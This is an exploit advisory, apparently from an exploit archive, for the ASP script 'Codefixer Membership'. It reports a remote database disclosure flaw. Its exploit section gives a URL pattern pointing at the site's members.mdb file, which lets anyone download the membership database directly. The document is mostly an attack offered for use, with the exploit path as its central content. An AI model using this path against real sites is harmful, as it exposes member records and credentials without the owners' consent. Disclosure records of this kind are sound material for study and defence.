id: 10288
date: 12/16/2009
title: Codefixer Membership Remote Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

=============================================================
Codefixer Membership Remote Database Disclosure Vulnerability
=============================================================

==============================================================================
        [»] ~ Note : Thx 2 Egyptian National Team
==============================================================================
        [»] Codefixer Membership Remote Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ Codefixer Membership ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ ASP membership management script system ]
    [»] Founder:            [ ViRuSMaN ]
###########################################################################
 
===[ Exploit ]===
 
    [»] http://[target].com/[path]/members.mdb
 
Author: ViRuSMaN <-



#  0day.today [2023-03-26]  #